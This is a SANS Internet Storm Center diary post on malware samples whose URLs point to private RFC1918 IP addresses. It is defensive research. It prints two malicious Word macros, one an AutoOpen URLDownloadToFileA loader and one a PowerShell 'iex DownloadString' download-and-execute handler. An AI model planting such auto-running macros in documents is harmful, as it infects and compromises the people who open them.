Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Private IP Addresses in Malware Samples? SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Private IP Addresses in Malware Samples?

I'm looking for some samples on VT that contains URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious. Why would a malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen()
' test Macro
x = URLDownloadToFileA(0, "", Environ("TEMP") & "\loader.dll", 0, 0)

End Sub

This one seems to be ongoing development and does not look too dangerous. But, wait, the use of VirusTotal can be very sensitive depending on your context and submitting files to VirusTotal must be performed carefully. If you are a Blue-teamer, uploading a sample might ring a bell at the attacker and let him know that you're looking at him. If you're a Red-teamer, uploading your self-made sample might help AV vendors to improve their detection mechanisms.

Here is another one found in another document with a higher VT score (22/57)[3]

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I found also a lot of DLL's and DEX files (Dalvik Executable from Android applications) that contains URLs with RFC1918 IP addresses.  I think that most of them are samples still being tested/developed.


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS Threat Hunting London 2022


649 Posts
ISC Handler
Sep 5th 2019

Sign Up for Free or Log In to start participating in the conversation!